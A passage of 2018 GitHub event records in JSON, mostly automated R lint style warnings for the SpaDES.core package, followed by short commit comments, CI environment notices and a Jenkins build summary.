^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:314:58:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/experiment.R#L314) *style:* **Commented code should be removed.**\n```r\n​            params(sim_)[[mod[x]]][[param[[x]]]] <- val #factorialExp[ind,x]\n                                                         ^~~~~~~~~~~~~~~~~~~\n```\n[R/helpers.R:230:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/helpers.R#L230) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​                             paste0(\"package:\", .pkgEnv$corePackagesVec[-(1:2)]))\n                                                                         ^\n```\n[R/helpers.R:260:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/helpers.R#L260) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​all.equal.simList <- function(target, current, ...) {\n^~~~~~~~~~~~~~~~~\n```\n[R/load.R:198:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/load.R#L198) *style:* **Lines should not be more than 100 characters.**\n```r\n​                names(argument) <- c(nam, names(formals(getFromNamespace(loadFun[y], loadPackage[y])))[1])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/misc-methods.R:467:55:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/misc-methods.R#L467) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​          (inherits(get(w, envir = envir), \"integer\")) ) {\n                                                      ^\n```\n[R/module-define.R:719:63:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/module-define.R#L719) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      exts <- na.omit(match(file_ext(fl), .fileExts[, \"exts\"]) )\n                                                              ^\n```\n[R/module-dependencies-class.R:53:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/module-dependencies-class.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            out.df <- data.frame(\n            ^~~~~~\n```\n[R/module-dependencies-class.R:172:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/module-dependencies-class.R#L172) *style:* **Commented code should be removed.**\n```r\n​    #   warning(\"input object data.frame should use colnames sourceURL.\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-dependencies-class.R:174:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n        ^\n```\n[R/module-dependencies-class.R:174:78:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n                                                                             ^\n```\n[R/module-dependencies-methods.R:43:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/module-dependencies-methods.R#L43) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- .depsEdgeListMem(deps, plot)\n    ^~\n```\n[R/module-dependencies-methods.R:56:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n  ^~~~~~\n```\n[R/module-dependencies-methods.R:56:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n            ^~~~~~~\n```\n[R/module-dependencies-methods.R:61:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/module-dependencies-methods.R#L61) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.in <- as.data.table(x@inputObjects)[, .(objectName, objectClass)]\n      ^~~~\n```\n[R/module-dependencies-methods.R:62:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/module-dependencies-methods.R#L62) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.out <- as.data.table(x@outputObjects)[, .(objectName, objectClass)]\n      ^~~~~\n```\n[R/module-dependencies-methods.R:65:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/module-dependencies-methods.R#L65) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.in <<- rbindlist(list(sim.in, z.in), use.names = TRUE)\n        ^~~~~~\n```\n[R/module-dependencies-methods.R:68:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/module-dependencies-methods.R#L68) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.out <<- rbindlist(list(sim.out, z.out), use.names = TRUE)\n        ^~~~~~~\n```\n[R/module-dependencies-methods.R:80:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/module-dependencies-methods.R#L80) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- dx[, list(from = module, to = i.module,\n    ^~\n```\n[R/module-dependencies-methods.R:83:15:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/module-dependencies-methods.R#L83) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (plot) DT <- DT[!duplicated(DT[, 1:2, with = FALSE]), ]\n              ^~\n```\n[R/module-dependencies-methods.R:85:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/module-dependencies-methods.R#L85) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- data.table(from = character(0), to = character(0),\n    ^~\n```\n[R/module-dependencies-methods.R:164:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/module-dependencies-methods.R#L164) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    M <- distances(simGraph, mode = \"out\")\n    ^\n```\n[R/module-dependencies-methods.R:196:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/module-dependencies-methods.R#L196) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​      missingObjects <- simEdgeList %>% filter(from != to) %>%\n                                    ~~^\n```\n[R/module-dependencies-methods.R:210:26:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/module-dependencies-methods.R#L210) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​    return(newEdgeList %>% data.table() %>% setorder(\"from\", \"to\", \"objName\"))\n                       ~~^\n```\n[R/module-dependencies-methods.R:246:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/module-dependencies-methods.R#L246) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​              loadOrder <- names(simGraph[[tsort, ]]) %>% .[!(. %in% \"_INPUT_\" )]\n                                                                              ^\n```\n[R/module-repository.R:28:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/module-repository.R#L28) *style:* **Lines should not be more than 100 characters.**\n```r\n​#'          (\\url{http://spades-core.predictiveecology.org/articles/ii-modules.html#module-directory-structure-modulename}),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:52:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/module-repository.R#L52) *style:* **Lines should not be more than 100 characters.**\n```r\n​    zipFiles <- grep(file.path(name, \"data\"), zipFiles, invert = TRUE, value = TRUE) # remove any zip in data folder\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:293:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/module-repository.R#L293) *style:* **Commented code should be removed.**\n```r\n​      #versionWarning(name, version)\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:305:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/module-repository.R#L305) *style:* **Lines should not be more than 100 characters.**\n```r\n​        GET(zip, ua, config = list(config(token = pat)), write_disk(localzip, overwrite = overwrite))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:401:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/module-repository.R#L401) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/module-repository.R:402:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/module-repository.R#L402) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/moduleMetadata.R:72:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/moduleMetadata.R#L72) *style:* **Commented code should be removed.**\n```r\n​    #metadata <- eval(parse(text = x)) # can't be used because can't evaluate start(sim)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:78:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/plotting-diagrams.R#L78) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- tail(completed(sim), n)\n    ^~\n```\n[R/plotting-diagrams.R:173:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/plotting-diagrams.R#L173) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​        sapply(ll, NROW) %>% sum() %>% `*`(., 26L)\n                         ~~^\n```\n[R/plotting-diagrams.R:325:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/plotting-diagrams.R#L325) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      PlotRemovingDots <- function(modDia, plotFn, axes, ...,\n      ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:326:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/plotting-diagrams.R#L326) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.color,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:327:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/plotting-diagrams.R#L327) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size,\n                                   ^~~~~~~~~~~\n```\n[R/plotting-diagrams.R:328:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/plotting-diagrams.R#L328) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size2,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:329:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/plotting-diagrams.R#L329) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.shape,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:330:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/plotting-diagrams.R#L330) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.cex,\n                                   ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:331:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/plotting-diagrams.R#L331) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.family,\n                                   ^~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:345:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/plotting-diagrams.R#L345) *style:* **Lines should not be more than 100 characters.**\n```r\n​          c(nchar(namesModDia)^0.8 * 10) # use exponential to stretch out, and multiplication to make all bigger\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting.R:6:31:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                              ^~~~~~~~\n```\n[R/plotting.R:6:41:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                                        ^~~~~~~~~~\n```\n[R/plotting.R:37:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                        ^~~~~~~~\n```\n[R/plotting.R:37:35:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                                  ^~~~~~~~~~\n```\n[R/plotting.R:86:22:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                    ~^~\n```\n[R/plotting.R:86:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                                                      ~^~\n```\n[R/plotting.R:87:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n          ~^~\n```\n[R/plotting.R:87:40:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                      ~^~\n```\n[R/plotting.R:87:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                                                        ~^~\n```\n[R/POM.R:128:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/POM.R#L128) *style:* **Lines should not be more than 100 characters.**\n```r\n​#' @param objFnCompare Character string. Either, \"MAD\" or \"RMSE\" indicating that inside the objective\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:186:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/POM.R#L186) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​           NaNRetries = NA, logObjFnVals = FALSE, weights, useLog = FALSE) {\n           ^~~~~~~~~~\n```\n[R/POM.R:196:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/POM.R#L196) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        NaNRetries, logObjFnVals, weights, useLog) {\n                        ^~~~~~~~~~\n```\n[R/POM.R:213:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/POM.R#L213) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (is.na(NaNRetries)) NaNRetries <- 1\n                           ^~~~~~~~~~\n```\n[R/POM.R:237:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/POM.R#L237) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​          sim_ <- Copy(sim)\n          ^~~~\n```\n[R/POM.R:255:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/POM.R#L255) *style:* **Put spaces around all infix operators.**\n```r\n​          envPOMCalled <- sys.frame(min(grep(\"POM\", sys.calls()))-1)\n                                                                ~^~\n```\n[R/POM.R:322:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/POM.R#L322) *style:* **Lines should not be more than 100 characters.**\n```r\n​          cat(format(unlist(lapply(objectiveRes, function(x) x[[\"value\"]])), digits = 4), dep = \"\\t\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:360:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/da7a63ac8ff997f0bf58f54ea8437aa3d27764f9/R/POM.R#L360) *style:* **Lines should not be more than 100 characters.**\n```r\n​      par[whP] <- unlist(deps[[modName]]@parameters$default[deps[[modName]]@parameters$paramName == names(P(sim, modName)[whParamsByMod[whP]])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n"}},"created_at":"2018-07-10T16:36:01Z"}
{"id":"7945019512","type":"CommitCommentEvent","actor":{"login":"KiboOst"},"repo":{"name":"jeedom/core"},"payload":{"comment":{"id":29659780,"position":null,"line":null,"path":null,"commit_id":"5042879fcd9f5ab5d1d398fcaef024a32a122e0b","created_at":"2018-07-10T16:36:37Z","updated_at":"2018-07-10T16:36:37Z","author_association":"CONTRIBUTOR","body":"Hâte de voir çà !!!! "}},"created_at":"2018-07-10T16:36:37Z"}
{"id":"7945022902","type":"CommitCommentEvent","actor":{"login":"uttamkumar13"},"repo":{"name":"uttamkumar13/Case-Study_Uttam"},"payload":{"comment":{"id":29659787,"position":null,"line":null,"path":null,"commit_id":"0c0b38e974df25b12b7f8acd857be2fa330a6c1c","created_at":"2018-07-10T16:37:16Z","updated_at":"2018-07-10T16:37:16Z","author_association":"OWNER","body":"Uploading the first commit with 2 test cases"}},"created_at":"2018-07-10T16:37:16Z"}
{"id":"7945025277","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/online-orientation"},"payload":{"comment":{"id":29659790,"position":null,"line":null,"path":null,"commit_id":"3d5e4322c0069c4922dc37c86b10373f8d1e38e5","created_at":"2018-07-10T16:37:42Z","updated_at":"2018-07-10T16:37:42Z","author_association":"COLLABORATOR","body":"Created multidev environment [online-orientation#ci-203](https://dashboard.pantheon.io/sites/714bd05e-1a33-4f35-93a2-e9d6add67063#ci-203).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-203-online-orientation.pantheonsite.io/)"}},"created_at":"2018-07-10T16:37:42Z"}
{"id":"7945028122","type":"CommitCommentEvent","actor":{"login":"kenny3fcb"},"repo":{"name":"mracar07/android_kernel_zuk_msm8996"},"payload":{"comment":{"id":29659797,"position":null,"line":null,"path":null,"commit_id":"274038953a9569ab9882f66e08cfc2c1f66f6912","created_at":"2018-07-10T16:38:15Z","updated_at":"2018-07-10T16:38:15Z","author_association":"NONE","body":"https://github.com/mracar07/android_kernel_zuk_msm8996/blob/oreo-mr1/arch/arm64/configs/z2_row_defconfig#L561-L563"}},"created_at":"2018-07-10T16:38:15Z"}
{"id":"7945028471","type":"CommitCommentEvent","actor":{"login":"byron70"},"repo":{"name":"byron70/extension-flex"},"payload":{"comment":{"id":29659799,"position":null,"line":null,"path":null,"commit_id":"5685149044109bc21d406d787e776a61ad07796e","created_at":"2018-07-10T16:38:19Z","updated_at":"2018-07-10T16:38:19Z","author_association":"OWNER","body":"What I found was `remotingMessage.getSource()` to always be null, for messages coming through the `classic-cfamf` channel/endpoint.\r\n`<endpoint uri=\"http://{server.name}:{server.port}{context.root}/flashservices/gateway/\" class=\"flex.messaging.endpoints.AMFEndpoint\"/>` \r\n\r\nThe destination however had the appropriate CFC pathway."}},"created_at":"2018-07-10T16:38:19Z"}
{"id":"7945029452","type":"CommitCommentEvent","actor":{"login":"Akhonbay"},"repo":{"name":"keni-m-patel/scitext-explorer"},"payload":{"comment":{"id":29659800,"position":null,"line":null,"path":null,"commit_id":"5aa49a49d381cd845988ef65e00f1950e3b234e5","created_at":"2018-07-10T16:38:29Z","updated_at":"2018-07-10T16:38:29Z","author_association":"COLLABORATOR","body":"update"}},"created_at":"2018-07-10T16:38:29Z"}
{"id":"7945037603","type":"CommitCommentEvent","actor":{"login":"ripplelabs-jenkins"},"repo":{"name":"mellery451/rippled"},"payload":{"comment":{"id":29659814,"position":null,"line":null,"path":null,"commit_id":"64eca2b61cc9c5a826c5c056eea52cbda3e3233d","created_at":"2018-07-10T16:40:02Z","updated_at":"2018-07-10T16:40:02Z","author_association":"COLLABORATOR","body":"\n## Jenkins Build Summary\n\nBuilt from [this commit](https://github.com/mellery451/rippled/commit/64eca2b61cc9c5a826c5c056eea52cbda3e3233d)\n\nBuilt at __20180710 - 16:40:02__\n\n### Test Results\n\nBuild Type | Log | Result | Status\n---------- | --- | ------ | ------\nrpm | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-fixman/7//artifact/rpm.txt) | 1034 cases, 0 failed, t: n/a | PASS :white_check_mark: \ngcc.release.unity <br/>-Dassert=true, <br/>MANUAL_TESTS=true | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-fixman/7//artifact/gcc.release.unity_Dassert_true_MANUAL_TESTS_true.txt) | 1101 cases, 0 failed, t: 805s | PASS :white_check_mark: \ndocs | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-fixman/7//artifact/docs.txt) | 1 cases, 0 failed, t: 2s | PASS :white_check_mark: \ncoverage | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-fixman/7//artifact/coverage.txt) | 1035 cases, 0 failed, t: 691s | PASS :white_check_mark: \nmsvc.debug | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-fixman/7//artifact/msvc.debug.txt) | 1032 cases, 0 failed, t: 567s | PASS :white_check_mark: \nclang.debug.unity | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-fixman/7//artifact/clang.debug.unity.txt) | 1035 cases, 0 failed, t: 249s | PASS :white_check_mark: \nclang.debug.unity, <br/>PARALLEL_TESTS=false | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-fixman/7//artifact/clang.debug.unity_PARALLEL_TESTS_false.txt) | 1035 cases, 0 failed, t: 494s | PASS :white_check_mark: \nclang.debug.nounity | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-fixman/7//artifact/clang.debug.nounity.txt) | 1033 cases, 0 failed, t: 252s | PASS :white_check_mark: \ngcc.debug.unity | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-fixman/7//artifact/gcc.debug.unity.txt) | 1035 cases, 0 failed, t: 250s | PASS :white_check_mark: \ngcc.debug.nounity | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-fixman/7//artifact/gcc.debug.nounity.txt) | 1033 cases, 0 failed, t: 255s | PASS :white_check_mark: \nclang.release.unity <br/>-Dassert=true | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-fixman/7//artifact/clang.release.unity_Dassert_true.txt) | 1034 cases, 0 failed, t: 340s | PASS :white_check_mark: \ngcc.release.unity <br/>-Dassert=true | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-fixman/7//artifact/gcc.release.unity_Dassert_true.txt) | 1034 cases, 0 failed, t: 353s | PASS :white_check_mark: \ngcc.debug.unity <br/>-Dstatic=true | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-fixman/7//artifact/gcc.debug.unity_Dstatic_true.txt) | 1035 cases, 0 failed, t: 246s | PASS :white_check_mark: \nmsvc.debug, <br/>PROJECT_NAME=rippled_classic | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-fixman/7//artifact/msvc.debug_PROJECT_NAME_rippled_classic.txt) | 1032 cases, 0 failed, t: 1236s | PASS :white_check_mark: \nmsvc.release | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/mellery-fixman/7//artifact/msvc.release.txt) | 1031 cases, 0 failed, t: 515s | PASS :white_check_mark: \n\n"}},"created_at":"2018-07-10T16:40:02Z"}
{"id":"7945039377","type":"CommitCommentEvent","actor":{"login":"mracar07"},"repo":{"name":"mracar07/android_kernel_zuk_msm8996"},"payload":{"comment":{"id":29659818,"position":null,"line":null,"path":null,"commit_id":"274038953a9569ab9882f66e08cfc2c1f66f6912","created_at":"2018-07-10T16:40:22Z","updated_at":"2018-07-10T16:40:22Z","author_association":"OWNER","body":"Known. Its overriding the marked lines. Im lazy for rebase this 😂"}},"created_at":"2018-07-10T16:40:22Z"}
{"id":"7945046991","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/online-orientation"},"payload":{"comment":{"id":29659833,"position":null,"line":null,"path":null,"commit_id":"c79cd7adf0371b02de508a32efb66533c3ba58af","created_at":"2018-07-10T16:41:48Z","updated_at":"2018-07-10T16:41:48Z","author_association":"COLLABORATOR","body":"Created multidev environment [online-orientation#pr-12](https://dashboard.pantheon.io/sites/714bd05e-1a33-4f35-93a2-e9d6add67063#pr-12).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-12-online-orientation.pantheonsite.io/)"}},"created_at":"2018-07-10T16:41:48Z"}
